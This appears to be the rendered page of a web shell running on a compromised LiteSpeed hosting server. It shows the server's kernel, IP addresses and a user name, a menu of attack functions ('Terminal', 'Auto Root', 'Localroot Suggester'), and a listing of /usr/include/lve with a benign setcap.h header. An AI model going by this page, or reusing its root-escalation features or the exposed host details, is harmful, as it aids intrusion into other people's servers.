Linux server.edchosting.com 4.18.0-553.79.1.lve.el7h.x86_64 #1 SMP Wed Oct 15 16:34:46 UTC 2025 x86_64
LiteSpeed
Server IP : 75.98.162.185 & Your IP : 216.73.216.163
Domains :
Cant Read [ /etc/named.conf ]
User : goons4good
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
usr /
include /
lve /
Delete
Unzip
Name
Size
Permission
Date
Action
lve-ctl.h
12.28
KB
-rw-r--r--
2026-01-20 08:47
lve-type.h
2.46
KB
-rw-r--r--
2026-01-20 08:47
secureio.h
2.4
KB
-rw-r--r--
2026-01-20 08:47
setcap.h
480
B
-rw-r--r--
2026-01-20 08:47
Save
Rename
/* Library to set needed capabilities for current process */ #ifndef _SETCAP_H_ #define _SETCAP_H_ #include <sys/types.h> // Switch on CAP_SYS_RESOURCE capabality to switch off disk quotas checking // // Returns 0 if successful // Returns -1 if error has occured int enable_quota_capability(); // Switch off CAP_SYS_RESOURCE capabality to switch off disk quotas checking // // Returns 0 if successful // Returns -1 if error has occured int disable_quota_capability(); #endif